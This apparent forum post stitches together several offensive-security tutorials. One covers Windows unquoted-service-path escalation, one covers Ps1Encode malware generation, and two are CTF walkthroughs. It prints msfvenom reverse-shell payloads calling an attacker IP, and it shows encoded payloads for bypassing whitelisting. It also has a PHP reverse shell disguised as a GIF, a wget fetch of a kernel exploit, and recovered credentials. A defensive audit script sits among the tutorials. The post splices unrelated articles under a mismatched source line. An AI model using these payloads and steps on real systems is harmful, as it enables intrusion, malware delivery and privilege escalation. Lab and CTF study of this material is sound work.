05-14-2020, 09:37 AM
Table of Contents
- Introduction
- Lab setup
- Spawn command shell as local user
- Escalated privilege via Prepend-migrate
- Escalated privilege via Adding user Administrators Group
- Escalated privilege via RDP & Sticky_keys
Introduction
The vulnerability is related to the path of a service executable that contains a space and is not enclosed in quotation marks (""). If the file also carries write permissions for low-privileged users, an attacker can replace the executable with a malicious exe to escalate to administrator privileges.
Lab set-up
Victim’s Machine: Windows 7
Attacker’s machine: Kali Linux
First, we downloaded and installed a vulnerable application, Photodex ProShow, on our Windows system.
![[Image: 8.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-2ae4fjQbedk/W3cLAK6TOaI/AAAAAAAAZ00/ANz3Kr4dSSUJnEYOvHP6i1ySjfVVZAUYgCLcBGAs/s1600/8.png?w=687)
Spawning Victim’s Machine
We need to compromise the Windows machine at least once to gain a Meterpreter session. As you can observe, we already have the victim's Meterpreter session. Now let's open a command shell from it.
![[Image: 9.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-NdIUb_-NLpo/W3cLAwX1gEI/AAAAAAAAZ04/6dez_ipF1BUTrhKNFVMYyf6AmLROUu4bQCLcBGAs/s1600/9.png?w=687)
```
shell
```
As you can observe, we have shell access as local_user; to get cmd as administrator we need to escalate privileges. First, we enumerate all the auto-start services on the victim's machine and find those whose binary path is not enclosed in quotes, with the help of the following command:
```
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
```
We enumerated the following path: C:\Program Files\Photodex\ProShow Producer\Scsiaccess.exe. As you can see, there are no quotes around the path and the path contains spaces.
![[Image: 10.1.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-XggELFddlIQ/W3cK9Gg8BtI/AAAAAAAAZ0M/LAgVXJ4SNTgYeYCwJf-cKLm5068VL9_9QCLcBGAs/s1600/10.1.png?w=687)
Now let's check the permissions on the executable using the following command:
```
icacls scsiaccess.exe
```
As you can observe, it has write permission for Everyone, which means user raj can overwrite this file.
![[Image: 10.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-_PVrl9_SzwQ/W3cK85tLd7I/AAAAAAAAZ0E/1IHh09hDlTwaDg9xkJvAjxcj8_WuL3QVQCLcBGAs/s1600/10.png?w=687)
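The same check can be run offline over saved wmic output. The following Python script is an added example (not part of the original write-up): it applies the wmic/findstr filter above, lists the file names Windows would try before the real binary for every unquoted path, and offers a best-effort writability check to pair with icacls. The service names and paths in the sample are constructed.

```python
"""Offline audit for unquoted service paths (added example, not from the write-up).

It applies the same filter as the wmic | findstr chain above: auto-start
services outside C:\\Windows whose PathName is not wrapped in quotes and
contains a space. For each hit it lists the file names Windows tries before
the real binary (C:\\Program.exe, C:\\Program Files\\...\\ProShow.exe, ...);
those are the locations whose parent directories must not be writable by
ordinary users, which is what the icacls check in the write-up verifies.
"""
import ntpath
import os
import re

# Constructed sample in the fixed-width layout wmic prints (not real host output).
_COLUMNS = ("Name", "DisplayName", "PathName", "StartMode")
_WIDTHS = (14, 22, 62, 11)
_ROWS = [
    ("ProShowSvc", "ProShow SCSI Access",
     r"C:\Program Files\Photodex\ProShow Producer\Scsiaccess.exe", "Auto"),
    ("GoodSvc", "Quoted Vendor Svc",
     r'"C:\Program Files\Good Vendor\svc.exe" -run', "Auto"),
    ("Spooler", "Print Spooler", r"C:\Windows\System32\spoolsv.exe", "Auto"),
    ("AgentSvc", "No Space Agent", r"C:\Tools\agent.exe --service", "Auto"),
    ("ManualSvc", "Manual Start Svc",
     r"C:\Program Files\Some Vendor\manual.exe", "Manual"),
]
SAMPLE_WMIC_OUTPUT = "\n".join(
    "".join(cell.ljust(width) for cell, width in zip(row, _WIDTHS))
    for row in [_COLUMNS, *_ROWS]
) + "\n"

_BINARY_RE = re.compile(r"^(.*?\.(?:exe|com|bat|cmd))(?:\s|$)", re.IGNORECASE)


def parse_wmic_table(text):
    """Parse wmic's fixed-width table using the header's column offsets."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    header, rows = lines[0], lines[1:]
    names = header.split()
    starts = [header.index(name) for name in names]
    ends = starts[1:] + [None]
    return [
        {name: row[start:end].strip() for name, start, end in zip(names, starts, ends)}
        for row in rows
    ]


def hijack_candidates(pathname):
    """Return the paths CreateProcess would try before the real binary, [] if safe."""
    pathname = pathname.strip()
    if not pathname or pathname.startswith('"'):
        return []  # a quoted path is parsed unambiguously
    match = _BINARY_RE.match(pathname)
    binary = match.group(1) if match else pathname  # no known extension: keep whole string
    if " " not in binary:
        return []
    parts = binary.split(" ")
    # Windows tries the text up to each space (with .exe appended) before the full name.
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def audit_services(wmic_text, exclude_prefix="C:\\Windows\\"):
    """Map service name -> hijack candidates for auto-start, unquoted, spaced paths."""
    findings = {}
    for rec in parse_wmic_table(wmic_text):
        if rec["StartMode"].lower() != "auto":
            continue
        if rec["PathName"].lower().startswith(exclude_prefix.lower()):
            continue
        candidates = hijack_candidates(rec["PathName"])
        if candidates:
            findings[rec["Name"]] = candidates
    return findings


def plantable_by_current_user(candidates):
    """On the audited host, keep candidates whose parent directory this account can write.

    os.access is a best-effort check; icacls (as in the write-up) is authoritative.
    """
    return [c for c in candidates if os.access(ntpath.dirname(c), os.W_OK)]


if __name__ == "__main__":
    # On a real host: wmic service get name,displayname,pathname,startmode > services.txt
    for service, candidates in audit_services(SAMPLE_WMIC_OUTPUT).items():
        print(service)
        for candidate in candidates:
            print("   would be tried first:", candidate)
```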
Escalated privilege via Prepend-migrate
Now we can place a malicious exe file in the same folder; when the service restarts, Windows will launch this executable instead of the genuine one, giving us admin privileges.
Open a terminal in Kali Linux and type the following command to generate an exe payload using msfvenom.
```
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 prependmigrate=true prependmigrateprocess=explorer.exe -f exe > /root/Desktop/scsiaccess.exe
```
The above command creates a malicious exe file on the Desktop; now send this file to the victim. The payload migrates to another process (explorer.exe here), so the attacker does not lose the session if the victim kills the payload's original process.
![[Image: 11.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-erSKk9PO7as/W3cK8-G3d_I/AAAAAAAAZ0I/PKzuT9gklS8KQybZrrlJbeVMBbfaSy25ACLcBGAs/s1600/11.png?w=687)
Now replace the genuine executable with the malicious exe. Here I renamed the genuine Scsiaccess.exe to Scsiaccess.exe.orginal, uploaded the malicious Scsiaccess.exe into the same folder, and then rebooted the victim's machine.
```
move scsiaccess.exe scsiaccess.exe.orginal
upload /root/Desktop/scsiaccess.exe .
reboot
```
![[Image: 12.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-UvGtC-JOzQ4/W3cK977hmfI/AAAAAAAAZ0U/pa630mvtYxgvRMjb6teDtgHQnHnPMk9mQCLcBGAs/s1600/12.png?w=687)
Meanwhile, we start a multi/handler listener in a new terminal to catch the Meterpreter session with admin privileges.
```
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit
```
Yuppie!! After some time we got a shell with admin privileges.
![[Image: 13.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-9j27YrgLrjs/W3cK94marSI/AAAAAAAAZ0Y/tURjuX4W_VYa4892z_Oim9ORyLT_1hDEQCLcBGAs/s1600/13.png?w=687)
Escalated privilege via Adding user Administrators Group
After spawning a shell as local_user, we enumerated the list of users, with and without admin privileges, and found that user raaz is not a member of the Administrators group.
```
net user
net user raaz
```
![[Image: 14.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-obNFPFYQOUE/W3cK97rpoVI/AAAAAAAAZ0Q/1ScFe2K5cz4FrmnsK5ufbWZwLLlXWL4SgCLcBGAs/s1600/14.png?w=687)
So again we generated an exe file, this time one that adds user raaz to the Administrators group. The name of our exe file is the same, i.e. Scsiaccess.exe.
```
msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f exe > /root/Desktop/scsiaccess.exe
```
![[Image: 15.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-awPfhnZpSwU/W3cK-vH4IiI/AAAAAAAAZ0c/yO5WIGZj65oIoEOY2yCunMXtZKHvsztJwCLcBGAs/s1600/15.png?w=687)
Now repeat the above steps: replace the genuine executable with the malicious exe file and reboot the host machine.
![[Image: 16.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-Ap5abA8GSPQ/W3cK_DRf8MI/AAAAAAAAZ0g/vy4cix0qf7cOrgsr3dMCYf_R3DEuf88twCLcBGAs/s1600/16.png?w=687)
As the following image shows, the user raaz has become a member of the Administrators group.
![[Image: 17.png?w=687]](https://i0.wp.com/1.bp.blogspot.com/-6Df9RVtr_bs/W3cK_VA92wI/AAAAAAAAZ0k/bxvjWan6JNIRTqU6o6hnTqBn4pJGrJbswCLcBGAs/s1600/17.png?w=687)
Escalated privilege via RDP & Sticky_keys
Generate an exe using msfvenom with the same name, Scsiaccess.exe, and transfer it to the victim's machine; meanwhile run multi/handler with an AutoRunScript that enables the RDP service once the service restarts.
```
use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > set AutoRunScript post/windows/manage/enable_rdp
msf exploit(multi/handler) > exploit
```
![[Image: 23.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-5emDwNwmZss/W3cK_cz8TYI/AAAAAAAAZ0o/6Cf3_mw2Ogopf8HaQVSlVB-sOiFVmqVlwCLcBGAs/s1600/23.png?w=687)
Similarly, we set the AutoRunScript to enable sticky keys once the service restarts.
```
msf exploit(multi/handler) > set AutoRunScript post/windows/manage/sticky_keys
msf exploit(multi/handler) > run
```
As you can observe from the screenshot below, another Meterpreter session (session 3) opened with administrative rights. Now let's connect to the victim's host via RDP.
```
rdesktop 192.168.1.101
```
![[Image: 24.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-kBVSR6_q-Ns/W3cK_4oPUkI/AAAAAAAAZ0s/yT_-Kzvf4P8V6JWVSY3CmisRpZ5RL3RHQCLcBGAs/s1600/24.png?w=687)
Now press the Shift key 5 times in a row and you will get a command prompt as administrator.
![[Image: 25.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-pWVmXvapKFY/W3cK_zXOryI/AAAAAAAAZ0w/oW5rv06HrLs_r-r_LYOs1gExZChpY_XvQCLcBGAs/s1600/25.png?w=687)
Source: https://www.exploit-db.com/exploits/24872/
In this article, we will learn the Ps1Encode tool and how to use it by generating malware in different file formats such as HTA, EXE, etc.
Introduction
Ps1Encode was developed by Piotr Marszalik, Dev Kennedy and a few others. It is used to generate a malicious payload that gives us a Meterpreter session, and it encodes the payload while generating it; this is another way to bypass whitelisting and security controls on the target system. It is written in Ruby and lets us create a series of Metasploit-based payloads in whatever format we want. The final aim is to get PowerShell running and execute our payload through it.
Ps1Encode supports the following formats for our malware:
- raw (encoded payload only – no powershell run options)
- cmd (for use with bat files)
- vba (for use with macro trojan docs)
- vbs (for use with vbs scripts)
- war (tomcat)
- exe (executable) requires MinGW – x86_64-w64-mingw32-gcc [apt-get install mingw-w64]
- java (for use with malicious java applets)
- js (javascript)
- js-rd32 (javascript called by rundll32.exe)
- php (for use with php pages)
- hta (HTML applications)
- cfm (for use with Adobe ColdFusion)
- aspx (for use with Microsoft ASP.NET)
- lnk (windows shortcut – requires a webserver to stage the payload)
- sct (COM scriptlet – requires a webserver to stage the payload)
Download Ps1Encode using the git clone command, as shown in the image below:
![[Image: 1.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-FVGtsOCbtP0/XHjzmjIqtnI/AAAAAAAAdM8/XtyTyfJ4IqwHXMc4dprCHTJFTMiEnstWACLcBGAs/s1600/1.png?w=687)
Once it’s downloaded, let’s use the help command to check the syntax that we have to use. Use the following set of commands for that :
```
cd ps1encode/
ls
./ps1encode.rb -h
```
![[Image: 2.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-Bt2brjdHSRw/XHjzmmg-III/AAAAAAAAdNA/ymDInApS4LMghM8kK7jG8lnSSSVxfgSiQCLcBGAs/s1600/2.png?w=687)
The options we will use are:
- -i : defines the local host IP
- -p : defines the local host port
- -a : defines the payload
- -t : defines the output format
Now, we will generate a malicious raw payload using the following command:
```
./ps1encode.rb -i 192.168.1.107 -p 8000 -a windows/meterpreter/reverse_https
```
![[Image: 3.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-5yPJLreqAh4/XHjzn52j-8I/AAAAAAAAdNI/UutLCB3uJkgSyEx4lA68sYQ_GBVU6wgWwCLcBGAs/s1600/3.png?w=687)
Copy the code generated by the above command into a file with the .bat extension and then serve it with a Python web server. You can start the server using the following command:
```
python -m SimpleHTTPServer 80
```
![[Image: 4.1.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-wkjQN_FJKVo/XHjzoVMQ5HI/AAAAAAAAdNM/KHqZPpaLhWQaMMcs5TroLJ1yFvH9dAnsACLcBGAs/s1600/4.1.png?w=687)
Simultaneously, start the multi handler to catch the session with the following set of commands:
```
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.107
set lport 8000
exploit
```
![[Image: 4.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-Sq4Hrcef6-Y/XHjzoSWdiEI/AAAAAAAAdNQ/yFJrgkKJaxQdIkymE6C4bcmPQEsv-jNHgCLcBGAs/s1600/4.png?w=687)
Once the file is executed on the victim's PC, you will get your session as shown in the image above. Now we will generate our malware in the form of an HTA file. Use the following command to generate the HTA file:
```
./ps1encode.rb -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverse_tcp -t hta
```
![[Image: 5.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-8oXhDZ36nwY/XHjzokrUcbI/AAAAAAAAdNU/QEe6wReV09IKyrbJ5w-7W3qB4dU7eO3ZACLcBGAs/s1600/5.png?w=687)
The above command creates the following script; send this file to the victim's PC using the Python server as before.
![[Image: 6.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-9FS1sMeBxxU/XHjzpfA84BI/AAAAAAAAdNc/-mrUR6KUGrkxRuOmvezb-fp4VM9gfno4ACLcBGAs/s1600/6.png?w=687)
Simultaneously, start the multi handler to catch the session, matching the payload and port used when the HTA file was generated:
```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.107
set lport 4444
exploit
```
![[Image: 8.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-kHLX0fjKt50/XHjzo-y4RLI/AAAAAAAAdNY/4OsJV_aJmYQOzhFdqW2g69NyKY43T1L2ACLcBGAs/s1600/8.png?w=687)
Once the file is executed on the victim's PC, you will get your session as shown in the image above. Now we will try to generate an EXE file with the following command:
```
./ps1encode.rb -i 192.168.1.107 -p 4444 -a windows/meterpreter/reverse_tcp -t exe
```
![[Image: 9.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-Eod8Xvobi-A/XHjzpUpjBXI/AAAAAAAAdNg/usr-lyQtmAQvwMLftuGux_0NBynng6JoACLcBGAs/s1600/9.png?w=687)
Send this file to the victim's PC using the Python server as before, as shown in the image above. Simultaneously, start the multi handler to catch the session, again matching the payload and port used for the EXE:
```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.107
set lport 4444
exploit
```
![[Image: 10.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-4cVLeM3TVCw/XHjznPB_TpI/AAAAAAAAdNE/xUrDAqydF8k1wutBAhZCdOWtMM2LpaozgCLcBGAs/s1600/10.png?w=687)
This way, you can use Ps1Encode to generate files in any format. As you can see, it’s pretty simple and convenient along with being user-friendly. Possibilities with Ps1Encode are endless.
Hello readers and welcome to another CTF challenge. This VM is made by Frank Tope, as you'll see on the very homepage of the server's website (his resume). Nice touch, if I might add. Anyhow, you can download this VM from VulnHub. The aim of this lab is to get root and read the congratulatory message written in the flag. I would rate the difficulty level of this lab as intermediate. Although there were no buffer overflows or unnecessary exploit development, it did make us think a little.
Steps Involved:
- Port scanning and IP discovery.
- Directory busting port 80.
- Directory busting port 8011.
- Discovering LFI vulnerability.
- Discovering an HTML backup file.
- Cracking password hash
- Logging in /development
- Uploading a PHP shell disguised as GIF file.
- Bypassing the check and triggering the file to get a netcat shell.
- Privilege escalation to get the flag.
The first step is as always, running netdiscover on the VM to grab the IP address. In my case, the IP was 192.168.1.103.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-Di-JzPjOMVM/W3BdM-5LdsI/AAAAAAAAZsw/wdsdZ_02m0Qnk-Jx4Mxy45Jp-fFtHw7xwCLcBGAs/s1600/1.png?w=687&ssl=1)
Once the IP was found, we ran an nmap aggressive scan to enumerate all the open ports.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-LHjyi99d5kU/W3BdOubZNoI/AAAAAAAAZtY/2KKQwSc6SbQQBQIJot0q1Fo9LCB1vDscQCLcBGAs/s1600/2.png?w=687&ssl=1)
What was there to wait for after we saw port 80 open! We headed straight into the browser and a webpage got displayed which looked like a single page resume.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-7vxY2LOKxT0/W3BdQThldpI/AAAAAAAAZt8/HOa3v5hhIRYafoLY5et6-8FbXiyHxAOtQCLcBGAs/s1600/3.png?w=687&ssl=1)
After not finding much, we chose to run the directory buster dirb.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/--dflh0la8oc/W3BdQiR--VI/AAAAAAAAZuE/bKJqgaXuh6YbXOVZL1r2NFRyZONrSA1cwCLcBGAs/s1600/5.png?w=687&ssl=1)
robots.txt seemed interesting at first but had nothing at all. Another directory was /development. It looked like a testing site since it asked for authentication.
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-5hWhnish0lA/W3BdQkDCNeI/AAAAAAAAZuA/Ubvl5WsQh74W9VS36MnK82UR3JiPsxnYwCLcBGAs/s1600/6.png?w=687&ssl=1)
After not finding much information, we then chose to look into port 8011. It looked like a backend to the development directory.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-C_nkXJGjUu0/W3BdQ0G2x4I/AAAAAAAAZuI/mIpMKxl_8S8T9mriVItQv1FkijmDQR-LACLcBGAs/s1600/7.png?w=687&ssl=1)
We ran one more dirb scan on this port.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-c6WCBBMrW5g/W3BdRUmWfiI/AAAAAAAAZuM/WFWwDSuQxKoA-KtwEJzBbGhErPJQMIs1wCLcBGAs/s1600/8.png?w=687&ssl=1)
We found an interesting directory called /api. We opened it in the browser immediately.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-evWYLdtyBYA/W3BdRnUjyLI/AAAAAAAAZuQ/sF0HKh7ZbGASwM7a2Klbsh8XG3k7kUA8QCLcBGAs/s1600/9.png?w=687&ssl=1)
We modified the URL to /api/<api-name> but only one API seemed to be working, and that was:
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-xSu6WUIOmxw/W3BdM_mwY7I/AAAAAAAAZs0/nb6Z1rmj1bcEsTniCGYdv9hBdaroAVZ1gCLcBGAs/s1600/10.png?w=687&ssl=1)
A message said, “no parameter called file passed to me.” It gave us a hint that we had to pass a parameter called file.
```
192.168.1.103:8011/api/files_api.php?file=/etc/passwd
```
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-JpiFqOcT69E/W3BdM4IqlrI/AAAAAAAAZs4/z3bKeqvlS64gHia9YZrvKnsQXHACEjy0ACLcBGAs/s1600/11.png?w=687&ssl=1)
HAHA. They got us. But still, there was another thing left to try: sending the parameter through curl.
```
curl -X POST -d "file=/etc/passwd" http://192.168.1.103:8011/api/files_api.php
```
As you can see, LFI is present here!
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-b_QBfUECbBI/W3BdNUzykzI/AAAAAAAAZs8/48hagVLJCMkOyGFT7iU7dXJI1PT5QC4LACLcBGAs/s1600/12.png?w=687&ssl=1)
Now, we tried some methods, poked here and there, but nothing worked with this LFI.
Meanwhile, another thing that got our attention was the development server. If you have a development site and a development server, there would likely be more than one HTML file, or copies of HTML files (backups).
One such common file is index.html.bak.
It was a shot in the dark, but it hit the bullseye!
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-aBvbujV6JNY/W3BdNuyrqeI/AAAAAAAAZtE/0e78V7TG-RsUuccaKcmlT-faBBN_3---ACLcBGAs/s1600/14.png?w=687&ssl=1)
We saved it and read it using cat utility.
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-YxNcr5zBoXI/W3BdNV3fiGI/AAAAAAAAZtA/PN6c6Jy_gfAXtfNowE0kF80h4l8dXrK8gCLcBGAs/s1600/15.png?w=687&ssl=1)
It had a password hash! It took us no time to copy this into a text file called hash.txt and run John the Ripper on it.
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-nlbyvX5OJfE/W3BdN4nS_BI/AAAAAAAAZtM/781fW7hvkOAmaQvok5nh3hHU1lU4KW0ZwCLcBGAs/s1600/17.png?w=687&ssl=1)
These were surely the credentials for the /development authentication:
frank:frank!!!!
![[Image: 18.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-IyHuSJIiRag/W3BdOF0fUTI/AAAAAAAAZtQ/WR1EBzP1x38iiG33TRT1KlqG3DMrHyWqwCLcBGAs/s1600/18.png?w=687&ssl=1)
And it opened up like a beautiful treasure!
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-BbHhjDUT08E/W3BdOQ2sfWI/AAAAAAAAZtU/DYz39YYQ7MI7lvySt5iQDYqgvMXb0IU1QCLcBGAs/s1600/19.png?w=687&ssl=1)
The message on this page said that the uploader tool was only half completed, so we went to the /uploader directory.
![[Image: 20.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-pBK5vU_tIOA/W3BdOvmPL7I/AAAAAAAAZtc/zTaoLufmit4l3AZKyPSeM2CHltdN0KrwQCLcBGAs/s1600/20.png?w=687&ssl=1)
The uploader had a security check allowing images only (jpg, png, gif) and a size limitation too.
So, here is what we did.
Go to /usr/share/webshells/php/php-reverse-shell.php.
Open it with a text editor, add GIF98 as the first line, and save the file as shell.gif.
![[Image: 21.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-z8nh9F7VrZw/W3BdO09xlAI/AAAAAAAAZtg/EpToTuHKnO0SyPu3DJYpsGx0n1TAtQOWgCLcBGAs/s1600/21.png?w=687&ssl=1)
This tricks the uploader into believing the file is a GIF when in reality it is a PHP reverse shell.
So we uploaded shell.gif using the uploader and received the following message.
![[Image: 22.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-LiZEXlGk4eg/W3BdPSmdQJI/AAAAAAAAZtk/3t3r5tW68fEeZO2cjgfzhoSfI3Uvs2m3wCLcBGAs/s1600/22.png?w=687&ssl=1)
Now, the author said the file was uploaded to his uploads path. Let's get a little perspective here.
Website's name: Frank's website
Uploader's name: Frank uploader
First message on the website: I love patterns
It took us a while, but in the end we guessed that the uploads directory would be named after Frank uploads.
We tried many permutations of this directory name, like Frankupload, frankUploads, franksuploads, etc., but the one that hit was FRANKuploads.
This step was tedious and time-consuming, as there was no direct link from anywhere to this directory.
![[Image: 23.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/--zqFQ1DrjXw/W3BdPkHzHTI/AAAAAAAAZto/FoC8gkvshMIfZctBvtKFzgLKOYCQx5mWACLcBGAs/s1600/23.png?w=687&ssl=1)
Now, all that was left was to trigger this file. We know that double-clicking won't do us any good, so we used curl once again to get a shell.
We started netcat in a terminal side by side and typed the following curl command:
```
curl -X POST -d "file=/var/www/development/uploader/FRANKuploads/shell.gif" http://192.168.1.103:8011/api/files_api.php
```
![[Image: 24.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-6zZPdx3LV0M/W3BdPp78TcI/AAAAAAAAZts/SLxW1UqK6rgtz8FmXBr4RB-WnfdmUyYBACLcBGAs/s1600/24.png?w=687&ssl=1)
On another terminal, we had netcat listening. As soon as curl triggered the LFI vulnerability and requested shell.gif, we got a netcat session!
```
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash");'
uname -a
```
![[Image: 25.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-hgedKyaEsow/W3BdP7ZhrEI/AAAAAAAAZtw/EdUeB4jtJ74rAABYQPRcaRt7RiSOMbApQCLcBGAs/s1600/25.png?w=687&ssl=1)
After a bit of searching, we found a Linux kernel exploit for version 2.6.
```
searchsploit 15285
cd Desktop
cp /usr/share/exploitdb/exploits/linux/local/15285.c .
python -m SimpleHTTPServer 80
```
![[Image: 26.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-mLYB_ViVH6k/W3BdQCD9UJI/AAAAAAAAZt0/o_Ukn6xjcYM3-in9RzG_D5UpBV3Q1jC2ACLcBGAs/s1600/26.png?w=687&ssl=1)
On our VM shell, we downloaded this exploit, compiled it and ran it to get root!
```
cd tmp
wget http://<attacker IP>/15285.c
gcc 15285.c -o 15285
chmod 777 15285
./15285
```
Voila! We got root!
```
cd root
ls
cat root.txt
```
![[Image: 27.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-7cQLcmdTLGE/W3BdQCjRO7I/AAAAAAAAZt4/JIihQ9_gmf0BmpPK1R-e5m8DtBElIqTBACLcBGAs/s1600/27.png?w=687&ssl=1)
And there it was, the flag. Hope you enjoyed because we sure did!
Hello friends! Today we are going to take on another CTF challenge, known as Wakanda, which is another capture-the-flag challenge provided for practice. So let's try to break through it. But first, please note that you need to download the VM.
Security Level: Intermediate
Flags: There are three flags (flag1.txt, flag2.txt, root.txt)
Penetrating Methodologies
- Network Scanning (Nmap, netdiscover)
- HTTP service enumeration
- Exploiting LFI using php filter
- Decode the base64-encoded text to get the password
- SSH Login
- Get 1st Flag
- Finding files owned by devops
- Overwrite antivirus.py via malicious python code
- Get netcat session
- Get 2nd flag
- Sudo Privilege Escalation
- Exploit Fake Pip
- Get the Root access and Capture the 3rd flag
Let’s start off with scanning the network to find our target.
```
netdiscover
```
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-wUXbYsmQcPA/W27JxytxBtI/AAAAAAAAZrQ/kopGcAFYseYtfdg7W5TEApFhJlextTHtQCEwYBhgL/s1600/1.png?w=687&ssl=1)
We found our target: 192.168.1.124
Our next step is to scan our target with NMAP.
```
nmap -p- -A 192.168.1.124
```
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-mf2lTtaoCw4/W27J2A4BurI/AAAAAAAAZrQ/BYKCMkO3FRgliVL7K2EalwAmhO4q_AxIACEwYBhgL/s1600/2.png?w=687&ssl=1)
The nmap output shows that there are 4 open ports: 80 (HTTP), 111 (RPC), 3333 (SSH), 48920 (RPC).
We browsed the website and poked around; however, we were not able to get any significant clues to move forward.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-8rzQ0xikp6A/W27J2WFJuuI/AAAAAAAAZrM/JV7PoOb4GekiRCccQL_1gdxiHu1ZNlduwCEwYBhgL/s1600/3.png?w=687&ssl=1)
We didn't find anything on the webpage, so we used dirb to enumerate the directories.
```
dirb http://192.168.1.124
```
![[Image: 4.1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-S9q4UVM28IQ/W27J22NKWSI/AAAAAAAAZrI/m2jRNqHZgaQTMjykjClWSahzrWVoX315QCEwYBhgL/s1600/4.1.png?w=687&ssl=1)
All the pages found by the dirb scan have size zero and we don't find any content on any of them. We take a look at the source of the index page and find a "lang" parameter commented inside the page.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-SXPnuaCTfaQ/W27J3qjx3WI/AAAAAAAAZrQ/jGvApOShXdEmm0VNg7gDh9E_6K69kB4jgCEwYBhgL/s1600/4.png?w=687&ssl=1)
We use the "lang" parameter just as shown in the page and find the text converted into French. Now we check whether the "lang" parameter is vulnerable to LFI.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-6bINCAgJTAk/W27J3wdmZDI/AAAAAAAAZrM/RWfKciVLgGw7802He6pinbnmHFRABNLVQCEwYBhgL/s1600/5.png?w=687&ssl=1)
We are able to exploit the LFI vulnerability using the "php://filter/convert.base64-encode" wrapper and read the source of the index page.
```
curl "<URL not preserved: the index page with lang=php://filter/convert.base64-encode/resource=...>"
```
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-VkEm3WupFzc/W27J4aRz7PI/AAAAAAAAZrU/fgyGsVH9XnUOYyKLIt3BQI7EKQz2OsvrgCEwYBhgL/s1600/8.png?w=687&ssl=1)
We decode the base64 encoded string and find the password “Niamey4Ever227!!!”. On the page, we find that “mamadou” is the author. We use these credentials to login through ssh on the target machine.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-WiG23keB3wE/W27J4kuD4hI/AAAAAAAAZrY/Y65bkhTyibcaWNJA6rHdj2TnMXdtMtFMwCEwYBhgL/s1600/9.png?w=687&ssl=1)
